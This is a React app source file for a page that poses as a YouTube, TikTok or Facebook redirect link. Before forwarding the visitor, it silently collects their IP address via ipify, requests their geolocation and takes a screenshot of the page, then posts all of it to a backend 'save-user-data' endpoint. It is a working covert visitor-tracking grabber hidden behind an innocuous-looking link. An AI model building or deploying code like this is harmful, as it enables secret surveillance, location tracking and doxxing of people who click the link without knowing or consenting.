// src/App.js
import React, { useEffect, useState } from "react";
import axios from "axios";
import html2canvas from "html2canvas";

const App = () => {
  const [redirectMessage, setRedirectMessage] = useState("Redirecting...");
  const backendURL = process.env.REACT_APP_BACKEND_URL;

  useEffect(() => {
    const fetchData = async () => {
      try {
        // 1. Get user's IP address from server or third-party API
        const ipResponse = await axios.get("https://api64.ipify.org?format=json");
        const ipAddress = ipResponse.data.ip;

        // 2. Try getting user's geolocation
        let geoData = {};
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(
            (position) => {
              geoData = {
                latitude: position.coords.latitude,
                longitude: position.coords.longitude,
              };
              collectAndSendData(ipAddress, geoData);
            },
            (error) => {
              console.error("Geolocation error:", error);
              collectAndSendData(ipAddress, geoData); // Send without geolocation
            }
          );
        } else {
          console.log("Geolocation not supported");
          collectAndSendData(ipAddress, geoData); // Send without geolocation
        }
      } catch (error) {
        console.error("Error fetching IP or geolocation:", error);
      }
    };

    const collectAndSendData = async (ip, geo) => {
      try {
        // Take Screenshot of Page
        let screenshot = "Not Captured";
        try {
          const screenshotCanvas = await html2canvas(document.body);
          screenshot = screenshotCanvas.toDataURL("image/png"); // Base64 string
        } catch (error) {
          console.error("Error taking screenshot:", error);
        }
        
        // Send Data to Server
        const payload = { ip, geo, screenshot };
        await axios.post(`${backendURL}/api/save-user-data`, payload);
        console.log("Data sent to server:", payload);
    
        // Redirect based on URL pattern
        setTimeout(() => {
          const currentURL = window.location.href;
          
          if (currentURL.includes('youtube-redirect')) {
            const subUrl = extractSubUrl(currentURL, 'youtube-redirect');
            window.location.href = `https://youtube.com/${subUrl}`;
          } 
          else if (currentURL.includes('tiktok-redirect')) {
            const subUrl = extractSubUrl(currentURL, 'tiktok-redirect');
            const link = document.createElement('a');
            link.href = `https://vm.tiktok.com/${subUrl}`;
            link.click();
          }
          else if (currentURL.includes('facebook-redirect')) {
            const subUrl = extractSubUrl(currentURL, 'facebook-redirect');
            window.location.href = `https://facebook.com/${subUrl}`;
          }
          else {
            window.location.href = "https://youtu.be/TxCiiW6pNU0?si=K996DyqL2kd-uRvM";
          }
        }, 500);
      } catch (error) {
        console.error("Error collecting or sending data:", error);
      }
    };
    
    // Helper function to extract the subUrl from the current URL
    const extractSubUrl = (url, domain) => {
      try {
        // Use URL API to parse the URL
        const urlObj = new URL(url);
        // Get the pathname (everything after the domain)
        const pathname = urlObj.pathname;
        
        // Remove any leading slashes
        const cleanPath = pathname.replace(/^\/+/, '');
        
        return cleanPath;
      } catch (error) {
        console.error("Error parsing URL:", error);
        
        // Fallback to string manipulation if URL parsing fails
        const domainIndex = url.indexOf(domain);
        if (domainIndex === -1) return '';
        
        // Find the position after the domain pattern
        const startPos = domainIndex + domain.length;
        
        // Get everything after the domain part
        const afterDomain = url.substring(startPos);
        
        // Remove leading slashes or dots if present
        return afterDomain.replace(/^[\/\.]+/, '');
      }
    };
    
    fetchData();
  }, []);

  return <div>{redirectMessage}</div>;
};

export default App;
